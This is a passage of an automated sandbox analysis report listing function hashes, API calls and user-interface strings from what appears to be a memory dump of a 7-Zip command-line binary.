                                                                                                                                                                                                                                                  • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                                  • Instruction ID: 6af0becd12f8ea623219337dd981319d34fe0169119b96d689dbcfc55ac5a89e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F02193637156C195DA309B25FAC43EAB325F789B94F988822CA4E97719CF3CC885CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1646373207-4044117955
                                                                                                                                                                                                                                                  • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                                                                  • Instruction ID: ca2d1de052fb115b2530cdb423af226626b1c42ef97a368a6cd5fac8ae4991a0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06E07EA8641A0691EE08DB59FEB935433B0F749B61F804036C42E03322EF3C825AC700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                                                                  • Instruction ID: 86fefaa32f3389e74c0a184fed1858a540759af05e7afdb8c7b757d6e5cd7137
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD31DA63728E8082DA50DF27D49026D6714BBD6FE4B48C221FF6E1B79ACF69C402C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 408039514-0
                                                                                                                                                                                                                                                  • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                                                                  • Instruction ID: 1e2d2acc7a3546737e2c62eced459c59673449eb94ba2cc1ac68f500605845e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F131B5232285808BCB30DF29E89025EB760F7C5794F845225EBAE87B65DF39D855CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1475443563-0
                                                                                                                                                                                                                                                  • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                                                                  • Instruction ID: ad026c3a55f9e831a627284225dc9fd0234a37a1fd57e2d73672a5038721eb9d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28317CA130C70091FB08DF2B99593E82329DB86FE4F949461EE0697607EF78CE45C394
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                                                                  • Instruction ID: 1ccbdbb168a44e2e265176b4cc9ec5bb58ad2786948d69e7603c32b662dee03e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75012C6326E58045CA11FB33E85276E6311F7C3B91F8490A2AF4E13711CE38C447C214
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                                                                  • Instruction ID: 7760b76787ff6c8b7ea92efc904fa4bfff02094f76fae14d3f29e8f96562d4e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB01EC6326A58045CA11FF37E46276E6310FBC7F91F8190A2AF4E53721CE38C487C628
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                                                                  • Instruction ID: 3e767498fb92d1a8397a1d49ea4a94f775f26027c71899a3f62a1be292d41d97
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501DA6372598489CA10EF77DD912A82324BBC6BA87988171BF1D4B755DE24CC52C364
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                                  • Instruction ID: 7eb400d4a67363cbec1d22c301736ed89b5d470340abc617f0ab7717fdf9f0e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F011A636259808ACB10BF37DC912682724BBC6B98B988171BF2D4B755DE60C842C364
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BC91C
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BC9F1
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BCADA
                                                                                                                                                                                                                                                    • Part of subcall function 009722E4: fflush.MSVCRT ref: 009722EB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free$fflushfputcmemset
                                                                                                                                                                                                                                                  • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                                  • API String ID: 2975459029-4064182643
                                                                                                                                                                                                                                                  • Opcode ID: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
                                                                                                                                                                                                                                                  • Instruction ID: 8ff857391ebc9fb058d7a2faefccfbc65761e33e2f6c7a836d32a098fafc4583
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF615EA37106859ADE38EB72E6913AE7325F785FD0F488026DF5F0B602DF28D8958350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: : $...$Junction: $REPARSE:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-1476144188
                                                                                                                                                                                                                                                  • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                                  • Instruction ID: 6019fd060a11d8a10a672d01d9825e1a3d14b1ddd0c7001c21d4a1a0275f60d5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B510233310A0492DB20EF26E8427AA7765FBC27A4F85D022EA8B5B755DF7CC545CB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 009B0E9C
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B0F5D
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B0FD8
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B0FF4
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 009B1092
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                                                                                                                                  • String ID: ???
                                                                                                                                                                                                                                                  • API String ID: 2578255354-1053719742
                                                                                                                                                                                                                                                  • Opcode ID: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
                                                                                                                                                                                                                                                  • Instruction ID: 1b8014e37070e14f6539c1adfa49facf04b04175a37496ffc3f000bd03ac53ab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2516172310A81A2EB68EF25DB543EE6320F784BA4F848516DF2D07761DF38D5A5C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • with the file from archive:, xrefs: 009B0D1C
                                                                                                                                                                                                                                                  • Would you like to replace the existing file:, xrefs: 009B0CF0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                                                                                                                                  • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                                                                                                                                  • API String ID: 3346953513-686978020
                                                                                                                                                                                                                                                  • Opcode ID: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
                                                                                                                                                                                                                                                  • Instruction ID: 8cf6af55c0a9a2b34ecf56cad10b1d23ec7f8ccfcbabd83a50c311ca62b1a013
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9741D26235478291DA299F65DA503EA7364F7C5BA0F4486229F6E073D1CF3CD898D305
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                  • API String ID: 1989314732-3653984579
                                                                                                                                                                                                                                                  • Opcode ID: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
                                                                                                                                                                                                                                                  • Instruction ID: bf77c0c6be3a7ea3b5a879f8c3c00a8e45101b3bef6b7f44ed43d51f54add6be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6310C72210A4081DB25AF29D9953DD3360F789FA8F989236DE5E4B7A9DF78C885C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Enter password (will not be echoed):, xrefs: 009BCE69
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                                                                                                                                                  • String ID: Enter password (will not be echoed):
                                                                                                                                                                                                                                                  • API String ID: 108775803-3720017889
                                                                                                                                                                                                                                                  • Opcode ID: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
                                                                                                                                                                                                                                                  • Instruction ID: 94cf45557cf53e82886bd6ac6dd21a3fb444ab05a1c5f2878b9b4ee093ff87d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E21FC6330560182EE289B66AF147B96365AF88BB1F185625EE2B4B3F5DF7CCC45C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputsfree
                                                                                                                                                                                                                                                  • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                                                                                                                                                                  • API String ID: 2581285248-3393983761
                                                                                                                                                                                                                                                  • Opcode ID: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
                                                                                                                                                                                                                                                  • Instruction ID: 2bbd294627f8b0b91778e9567d1ff3ec448f36e51943445797b1dc2ee738e664
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD218363310A4595DE24EF26E86079D6730F7C9BE4F948222EE5E47369EF28C649C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
